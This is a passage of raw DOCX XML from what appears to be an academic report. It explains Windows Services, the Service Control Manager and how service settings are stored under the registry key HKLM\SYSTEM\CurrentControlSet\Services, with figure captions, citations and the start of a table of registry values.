          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00ED091A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Registry value types and their descriptions.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="00DC7DDE" w:rsidRDefault="00DC7DDE" w:rsidP="00DC7DDE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED091A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00ED091A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://support.microsoft.com/en-us/help/256986/windows-registry-information-for-advanced-users</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DC7DDE" w:rsidRPr="00DC7DDE" w:rsidRDefault="00DC7DDE" w:rsidP="00DC7DDE"/>
    <w:p w:rsidR="00C44A6F" w:rsidRPr="002B7F94" w:rsidRDefault="00C44A6F" w:rsidP="000C11BF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00095BB2" w:rsidRDefault="00E41963" w:rsidP="00095BB2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc484962991"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00095BB2">
        <w:t xml:space="preserve"> Service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidR="00095BB2" w:rsidRDefault="00095BB2" w:rsidP="00095BB2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00095BB2" w:rsidRDefault="00095BB2" w:rsidP="00095BB2">
      <w:r>
        <w:t xml:space="preserve">Microsoft </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Service</w:t>
      </w:r>
      <w:r w:rsidR="00DB49AE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="-1145814098"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00DB49AE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00DB49AE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Service \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00DB49AE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(2)</w:t>
          </w:r>
          <w:r w:rsidR="00DB49AE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00DB49AE">
        <w:t xml:space="preserve"> is a computer program which operates silently in the background of the Microsoft </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00DB49AE">
        <w:t xml:space="preserve"> Operation System. Window Service program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> offers an ability for user to create a persistent and auto-running executable applications. </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00DB49AE">
        <w:t xml:space="preserve"> services can be started automatically when system boots, or can be stopped, paused and change without interfering any concurrent working users on that local system. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB49AE" w:rsidRDefault="00DB49AE" w:rsidP="00095BB2">
      <w:r>
        <w:t>A service</w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the window service program is an entity that must conform to the rules, protocols and policy of the Service Control Manager</w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t xml:space="preserve"> (SCM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t xml:space="preserve">Besides that, </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t xml:space="preserve"> also support for driver service, which conforms to the device driver protocols for working with system devices. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB49AE" w:rsidRDefault="00062D79" w:rsidP="00062D79">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Service Control Manager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A6051" w:rsidRPr="006A6051" w:rsidRDefault="00E41963" w:rsidP="006A6051">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="006A6051" w:rsidRPr="006A6051">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Servic</w:t>
      </w:r>
      <w:r w:rsidR="006A6051">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="006A6051" w:rsidRPr="006A6051">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>s and Service Control Manager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C365B" w:rsidRDefault="00E41963" w:rsidP="003C365B">
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> Services</w:t>
      </w:r>
      <w:r w:rsidR="00FB3953">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="1739511146"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Mic \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(6)</w:t>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> are application that run on </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> computers regardless of whether a user is logged in. A </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> services is an entity that comprise a</w:t>
      </w:r>
      <w:r w:rsidR="00D5205D">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> executable file, a directory for storing application components, and </w:t>
      </w:r>
      <w:r>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> settings that define the parameters used for that service. A </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003C365B">
        <w:t xml:space="preserve"> service can be started automatically when the system is boot, or </w:t>
      </w:r>
      <w:r w:rsidR="00006825">
        <w:t xml:space="preserve">manually by a software that control the service. Services can be controlled by any program that integrated a service control method, which is a Remote Procedure Call (RPC) </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="1329481418"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION MSD1 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(7)</w:t>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="560368523"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr>
          <w:rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
        </w:sdtEndPr>
        <w:sdtContent>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION MSD \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t xml:space="preserve"> (8)</w:t>
          </w:r>
          <w:r w:rsidR="00FB3953" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D5205D" w:rsidRPr="00D5205D">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00006825">
        <w:t>to SCM functions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173F3F" w:rsidRDefault="00B37AF9" w:rsidP="00062D79">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Service Control Manager (SCM) is a </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00803051">
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidR="00173F3F">
        <w:t xml:space="preserve"> for managing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and control</w:t>
      </w:r>
      <w:r w:rsidR="00173F3F">
        <w:t>ling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application services and driver services</w:t>
      </w:r>
      <w:r w:rsidR="00AF24DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="1443188206"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00AF24DE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Tec05 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00AF24DE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(9)</w:t>
          </w:r>
          <w:r w:rsidR="00AF24DE" w:rsidRPr="00D5205D">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>. SCM maintains a database of installed services and driver services, and provides a unified and s</w:t>
      </w:r>
      <w:r w:rsidR="009A5E7D">
        <w:t>ecure</w:t>
      </w:r>
      <w:r w:rsidR="00173F3F">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="009A5E7D">
        <w:t xml:space="preserve"> means of controlling them. SCM database comprise information about each service and how it </w:t>
      </w:r>
      <w:r w:rsidR="00D5205D">
        <w:t>must</w:t>
      </w:r>
      <w:r w:rsidR="009A5E7D">
        <w:t xml:space="preserve"> be handled by the system. </w:t>
      </w:r>
      <w:r w:rsidR="00803051">
        <w:t>The information is mainly about how each service could be started when system boots, which information they need to run their executable applications and what are the security requirements for each service.</w:t>
      </w:r>
      <w:r w:rsidR="009A5E7D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00173F3F">
        <w:t xml:space="preserve">SCM database is stored in a </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00173F3F">
        <w:t xml:space="preserve"> location: </w:t>
      </w:r>
      <w:r w:rsidR="00173F3F" w:rsidRPr="00173F3F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Services</w:t>
      </w:r>
      <w:r w:rsidR="00173F3F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173F3F" w:rsidRDefault="00173F3F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00062D79" w:rsidRDefault="00173F3F" w:rsidP="00062D79">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>In that location, each installed service is stored as an entry key, which name corresponds to the nam</w:t>
      </w:r>
      <w:r w:rsidR="00BC587C">
        <w:t>e of the service (see figure 2.4</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173F3F" w:rsidRDefault="00173F3F" w:rsidP="00173F3F">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2358EADB" wp14:editId="572A2543">
            <wp:extent cx="5581650" cy="3811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1650" cy="3811270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173F3F" w:rsidRPr="00C44A6F" w:rsidRDefault="00173F3F" w:rsidP="00C44A6F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc483834781"/>
      <w:bookmarkStart w:id="48" w:name="_Toc484886345"/>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> service is stored as an entry key in the SCM database </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> location</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w:rsidR="00173F3F" w:rsidRDefault="00173F3F" w:rsidP="00A2470A">
      <w:r>
        <w:t xml:space="preserve">The name of an entry in this location is called a service name. However, when we work with a service, the name that display by a service management tool (such as sc.exe) is called a display name. The display name can be different to the service name, and is stored in </w:t>
      </w:r>
      <w:r w:rsidR="00A2470A">
        <w:t xml:space="preserve">the service entry key. For example, a service named “AxInstSV” which has its entry key stored at “HKLM\SYSTEM\CurrentControlSet \Services\AxInstSv” has a display name called “ActiveX Installer” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005763A" w:rsidRDefault="0005763A">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005763A" w:rsidRDefault="0005763A" w:rsidP="00A2470A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Opening a service entry key in </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Editor, we can see that there are so many </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values for that service. Those </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values are used to specified the information se</w:t>
      </w:r>
      <w:r w:rsidR="00BC587C">
        <w:t>t to the service (see figure 2.5</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005763A" w:rsidRDefault="0005763A" w:rsidP="0005763A">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78A02DB3" wp14:editId="0DE4C5AC">
            <wp:extent cx="5581650" cy="3797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1650" cy="3797935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A2470A" w:rsidRPr="00C44A6F" w:rsidRDefault="0005763A" w:rsidP="00C44A6F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc483834782"/>
      <w:bookmarkStart w:id="50" w:name="_Toc484886346"/>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each service entry key stores many </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44A6F">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> values that specify its information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w:rsidR="00E44D34" w:rsidRDefault="00135336" w:rsidP="00E44D34">
      <w:r>
        <w:t>The following table describe those values and their abilities:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2724"/>
        <w:gridCol w:w="2326"/>
        <w:gridCol w:w="3730"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C5F8C" w:rsidTr="005C5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2724" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00135336" w:rsidRPr="002C2B3F" w:rsidRDefault="00135336" w:rsidP="00E44D34">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
